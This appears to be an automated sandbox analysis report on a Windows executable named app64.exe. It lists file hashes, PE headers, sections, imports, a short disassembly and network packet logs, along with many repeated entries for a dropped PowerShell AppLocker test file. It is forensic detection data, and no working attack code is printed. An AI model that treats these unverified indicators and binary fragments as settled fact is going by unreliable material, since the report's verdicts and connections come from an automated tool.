                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b...&.i.&.i.&.i./.....i.6qh.%.i.6q..".i.6qj.%.i.6qm...i.6ql.*.i.Vth.$.i.&.h...i.npm.).i.npi.'.i.np..'.i.&...'.i.npk.'.i.Rich&.i.........PE..d...a..f.........." ...)..................................................................`..........................................O......@W..........P....p..@...............l....>..T...........................`=..@...............x............................text............................... ..`.rdata...l.......n..................@..@.data........`.......L..............@....pdata..@....p.......N..............@..@.rsrc...P............Z..............@..@.reloc..l............`..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                              File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                              Entropy (8bit):5.54448762285646
                                                                                                                                                                              TrID:
                                                                                                                                                                              • Win64 Executable (generic) (12005/4) 74.95%
                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 12.51%
                                                                                                                                                                              • DOS Executable Generic (2002/1) 12.50%
                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                                                                                                                                              File name:app64.exe
                                                                                                                                                                              File size:32'768 bytes
                                                                                                                                                                              MD5:40b887735996fc88f47650c322273a25
                                                                                                                                                                              SHA1:e2f583114fcd22b2083ec78f42cc185fb89dd1ff
                                                                                                                                                                              SHA256:d762fccbc10d8a1c8c1c62e50bce8a4289c212b5bb4f1fe50f6fd7dd3772b14a
                                                                                                                                                                              SHA512:5dd81a17725c0fb9dae4341e4d5f46ba1035fdba2786a15b5288b4281cd7b0741889a6813da2f797a2581fed08d0f407b6fad0315bdac50ff62c94cb7a7ead13
                                                                                                                                                                              SSDEEP:768:+xFSjpGYffiFMi1zhWMDND267ZmpKgrVJORY:gojMsfiFMi1FWMDNS67ZkV
                                                                                                                                                                              TLSH:DAE2F81DB3E780EDC257C2B89ADBD3727271B84C1634276E03A1D2613F619289F7CA95
                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......g...............'.F...|.................@.....................................!....`... ............................
                                                                                                                                                                              Icon Hash:00928e8e8686b000
                                                                                                                                                                              Entrypoint:0x1400013d0
                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                                                                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                              Time Stamp:0x6714F4CD [Sun Oct 20 12:17:17 2024 UTC]
                                                                                                                                                                              TLS Callbacks:0x40003f90, 0x1, 0x40003f60, 0x1
                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                              OS Version Major:4
                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                              File Version Major:4
                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                              Import Hash:ba6aa43dbeb22ec81447ad1153f91aaf
                                                                                                                                                                              Instruction
                                                                                                                                                                              dec eax
                                                                                                                                                                              sub esp, 28h
                                                                                                                                                                              dec eax
                                                                                                                                                                              mov eax, dword ptr [00006945h]
                                                                                                                                                                              mov dword ptr [eax], 00000001h
                                                                                                                                                                              call 00007F63F46D718Fh
                                                                                                                                                                              nop
                                                                                                                                                                              nop
                                                                                                                                                                              dec eax
                                                                                                                                                                              add esp, 28h
                                                                                                                                                                              ret
                                                                                                                                                                              nop dword ptr [eax]
                                                                                                                                                                              dec eax
                                                                                                                                                                              sub esp, 28h
                                                                                                                                                                              dec eax
                                                                                                                                                                              mov eax, dword ptr [00006925h]
                                                                                                                                                                              mov dword ptr [eax], 00000000h
                                                                                                                                                                              call 00007F63F46D716Fh
                                                                                                                                                                              nop
                                                                                                                                                                              nop
                                                                                                                                                                              dec eax
                                                                                                                                                                              add esp, 28h
                                                                                                                                                                              ret
                                                                                                                                                                              nop dword ptr [eax]
                                                                                                                                                                              dec eax
                                                                                                                                                                              sub esp, 28h
                                                                                                                                                                              call 00007F63F46DB06Ch
                                                                                                                                                                              dec eax
                                                                                                                                                                              cmp eax, 01h
                                                                                                                                                                              sbb eax, eax
                                                                                                                                                                              dec eax
                                                                                                                                                                              add esp, 28h
                                                                                                                                                                              ret
                                                                                                                                                                              nop
                                                                                                                                                                              nop
                                                                                                                                                                              nop
                                                                                                                                                                              nop
                                                                                                                                                                              nop
                                                                                                                                                                              nop
                                                                                                                                                                              nop
                                                                                                                                                                              nop
                                                                                                                                                                              nop
                                                                                                                                                                              nop
                                                                                                                                                                              nop
                                                                                                                                                                              nop
                                                                                                                                                                              dec eax
                                                                                                                                                                              lea ecx, dword ptr [00000009h]
                                                                                                                                                                              jmp 00007F63F46D73C9h
                                                                                                                                                                              nop dword ptr [eax+00h]
                                                                                                                                                                              ret
                                                                                                                                                                              nop
                                                                                                                                                                              nop
                                                                                                                                                                              nop
                                                                                                                                                                              nop
                                                                                                                                                                              nop
                                                                                                                                                                              nop
                                                                                                                                                                              nop
                                                                                                                                                                              nop
                                                                                                                                                                              nop
                                                                                                                                                                              nop
                                                                                                                                                                              nop
                                                                                                                                                                              nop
                                                                                                                                                                              nop
                                                                                                                                                                              nop
                                                                                                                                                                              nop
                                                                                                                                                                              push ebp
                                                                                                                                                                              dec eax
                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                              mov eax, ecx
                                                                                                                                                                              mov byte ptr [ebp+10h], al
                                                                                                                                                                              movzx eax, byte ptr [ebp+10h]
                                                                                                                                                                              dec eax
                                                                                                                                                                              cwde
                                                                                                                                                                              dec eax
                                                                                                                                                                              lea edx, dword ptr [00005BBAh]
                                                                                                                                                                              movzx eax, byte ptr [eax+edx]
                                                                                                                                                                              pop ebp
                                                                                                                                                                              ret
                                                                                                                                                                              push ebp
                                                                                                                                                                              dec eax
                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                              mov eax, ecx
                                                                                                                                                                              mov byte ptr [ebp+10h], al
                                                                                                                                                                              movzx eax, byte ptr [ebp+10h]
                                                                                                                                                                              dec eax
                                                                                                                                                                              cwde
                                                                                                                                                                              dec eax
                                                                                                                                                                              lea edx, dword ptr [00005C9Eh]
                                                                                                                                                                              movzx eax, byte ptr [eax+edx]
                                                                                                                                                                              pop ebp
                                                                                                                                                                              ret
                                                                                                                                                                              push ebp
                                                                                                                                                                              dec eax
                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                              mov eax, ecx
                                                                                                                                                                              mov byte ptr [ebp+10h], al
                                                                                                                                                                              movzx eax, byte ptr [ebp+10h]
                                                                                                                                                                              lea ecx, dword ptr [eax+eax]
                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xb0000xa04.idata
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x80000x408.pdata
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xe0000xa4.reloc
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x78c00x28.rdata
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0xb2b80x1f0.idata
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                              .text0x10000x45c80x4600c937a59989fcdb345a76fb50c16cf183False0.4512276785714286data5.757316129084278IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                              .data0x60000x8800xa002ed2a96493c9a3998baeb8e19384ef60False0.72734375data6.326352312940631IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                              .rdata0x70000xe900x100013fd4a5f5eec3eb29065740daafdb108False0.59814453125GLS_BINARY_LSB_FIRST5.635730896861803IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                              .pdata0x80000x4080x6003e34adfc19124a49f3b9277b2f85ee95False0.3567708333333333data3.0710657012843847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                              .xdata0x90000x38c0x400d37c4f135535a1debbd01a7d49b7b5a7False0.3330078125data3.8162853077464383IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                              .bss0xa0000x1a00x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                              .idata0xb0000xa040xc00e20821405dd2d497f15c686474c53797False0.2867838541666667data3.5279906085618915IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                              .CRT0xc0000x600x2009e63ef6141edd1f4d1f6292352380f13False0.068359375data0.28655982431271465IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                              .tls0xd0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                              .reloc0xe0000xa40x2006b290c3830d79e0fecbb891ef5d6531dFalse0.302734375data1.9961263134859424IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                              DLLImport
                                                                                                                                                                              KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
                                                                                                                                                                              api-ms-win-crt-environment-l1-1-0.dll__p__environ, __p__wenviron
                                                                                                                                                                              api-ms-win-crt-heap-l1-1-0.dll_set_new_mode, calloc, free, malloc
                                                                                                                                                                              api-ms-win-crt-math-l1-1-0.dll__setusermatherr
                                                                                                                                                                              api-ms-win-crt-private-l1-1-0.dll__C_specific_handler, memcpy
                                                                                                                                                                              api-ms-win-crt-runtime-l1-1-0.dll__p___argc, __p___argv, __p___wargv, _cexit, _configure_narrow_argv, _configure_wide_argv, _crt_at_quick_exit, _crt_atexit, _exit, _initialize_narrow_environment, _initialize_wide_environment, _initterm, _set_app_type, _set_invalid_parameter_handler, abort, exit, signal
                                                                                                                                                                              api-ms-win-crt-stdio-l1-1-0.dll__acrt_iob_func, __p__commode, __p__fmode, __stdio_common_vfprintf, __stdio_common_vfwprintf, fwrite
                                                                                                                                                                              api-ms-win-crt-string-l1-1-0.dllmemset, strcmp, strlen, strncmp, towupper, wcscmp, wcscpy_s
                                                                                                                                                                              api-ms-win-crt-time-l1-1-0.dll__daylight, __timezone, __tzname, _tzset
                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Oct 30, 2024 11:28:55.658551931 CET49704443192.168.2.5140.82.121.4
                                                                                                                                                                              Oct 30, 2024 11:28:55.658593893 CET44349704140.82.121.4192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:28:55.658665895 CET49704443192.168.2.5140.82.121.4
                                                                                                                                                                              Oct 30, 2024 11:28:55.667372942 CET49704443192.168.2.5140.82.121.4
                                                                                                                                                                              Oct 30, 2024 11:28:55.667393923 CET44349704140.82.121.4192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:28:56.529995918 CET44349704140.82.121.4192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:28:56.530091047 CET49704443192.168.2.5140.82.121.4
                                                                                                                                                                              Oct 30, 2024 11:28:56.534528017 CET49704443192.168.2.5140.82.121.4
                                                                                                                                                                              Oct 30, 2024 11:28:56.534539938 CET44349704140.82.121.4192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:28:56.534780025 CET44349704140.82.121.4192.168.2.5
